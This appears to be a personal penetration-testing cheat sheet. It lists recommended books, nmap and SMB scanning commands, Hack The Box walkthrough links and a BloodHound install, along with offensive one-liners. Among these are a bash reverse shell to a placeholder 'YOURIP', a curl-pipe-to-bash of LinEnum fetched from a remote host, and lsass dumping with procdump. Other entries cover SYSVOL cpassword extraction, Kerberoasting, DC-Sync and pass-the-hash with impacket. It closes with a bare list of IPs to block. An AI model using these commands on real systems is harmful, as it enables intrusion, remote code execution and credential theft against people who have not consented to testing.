Some books you want to read:

• The OSINT Handbook: A practical guide to gathering and analyzing online information
• Advanced Penetration Testing with Kali Linux: Unlocking industry-oriented VAPT tactics
• Fighting Phishing: Everything You Can Do to Fight Social Engineering and Phishing

usefull tips and tools for hacking

• create a file with a range of ip addresses: seq -f "10.10.10.%g" 1 254 > ip.txt
• or use prips 10.0.0.0/23 > ip.txt (first install prips: apt install prips)
• echo $HISTFILE to check the history file location

Port scan commands

• nmap -T4 -sV -sT --reason -p1-65535 --vv -oN 'filename' 'IP'
• nmap -sC -sV -oA filename ip - ippsec parameters
• nmap --script vuln 'IP'
• nmap -sV -sC -A -oN filename ip
• unicornscan -r300 -mU 'IP' - UDP scan. USE -mT for TCP

IpSec

• python -m SimpleHTTPServer PORT
• curl IP:PORT/LinEnum.sh | bash

SMB scan

• smbclient -N //ip/sharename

Priv Esc

• sudo -l
• https://github.com/ohpe/juicy-potato

Shell

• python -c 'import pty; pty.spawn("/bin/sh")'
• python -c 'import pty; pty.spawn("/bin/bash")'
• bash -c 'bash -i >& /dev/tcp/YOURIP/PORT 0>&1'
• when having a shell type CTRL-Z to background the shell. then type stty raw -echo and then fg

WPscan

• wpscan -u URL -eu -ep -et

IPSEC hackthebox

• juicypotato windows priv esc - Conceal https://www.youtube.com/watch?v=1ae64CdwLHE
• setuid viewuser - Irked https://www.youtube.com/watch?v=OGFTM_qvtVI
• hackthebox squid server - https://www.youtube.com/watch?v=5wyvpJa9LdU

Bloodhound

• wget -O - https://debian.neo4j.org/neotechnology.gpg.key | sudo apt-key add -
• echo 'deb https://debian.neo4j.org/repo stable/' | sudo tee /etc/apt/sources.list.d/neo4j.list
• sudo apt-get update
• apt-get install neo4j
• apt-get install bloodhound
• neo4j start (set the admin password in the browser)
• bloodhound

Screenshot

• gowitness-2.1.2-windows-amd64.exe scan --cidr 192.168.230.0/24 --threads 10
• gowitness-2.1.2-windows-amd64.exe scan -f ip_in_file.txt --threads 10
• gowitness-2.1.2-windows-amd64.exe report serve

Procdump

• procdump lsass https://www.onlinehashcrack.com/how-to-procdump-mimikatz-credentials.php

cpassword

• findstr -S cpassword $env:logonserver\sysvol\*.xml
• crack passwords with https://github.com/t0thkr1s/gpp-decrypt

Find string with grep

• grep -oP '(?<="InsertSearchString": ")[^"]*'

Run pingcastle fromt CMD

• PingCastle.exe --server dc.local --user xxxx --password xxxx --healthcheck
• PingCastle.exe --server x.x.x.x --export users --user domainuser --password domainpassword

Find in Linux

• find -L . -name "foo*"

Kerberos attacks

• From a non-domain PC: python GetUsersSPN.py -dc-ip x.x.x.x bla.local/account:password -request
• or from a domain joined PC python GetUsersSPN.py bla.local/account:password -request
• DC-Sync attack: python secretsdump.py bla.local/account:password@dc1.bla.local
• if that works you can use python wmiexec.py bla.local/account@dc1.bla.local -hashes "insert hash"

find installed MSI's

• Get-WmiObject Win32_Product | Format-Table IdentifyingNumber, Name wmiexec /fa ID

Blacklist IP's when installing letsenscrypt 180.188.243.95 79.137.68.184 134.122.89.242 144.126.198.24 51.81.245.138 45.142.96.48 168.151.165.42 180.149.11.253 119.12.180.71 18.170.66.210 161.35.246.138 51.75.141.254 46.246.122.80 34.220.105.216 185.220.100.247 104.129.18.188 154.47.30.167 84.247.116.160 45.87.212.76 104.244.209.36 34.248.137.227 54.247.57.72 37.19.210.17 66.115.189.222 51.81.46.212 135.148.100.196 96.9.246.196 5.181.234.134 104.166.80.40 104.166.80.254 45.56.71.92 79.125.7.88 66.115.165.233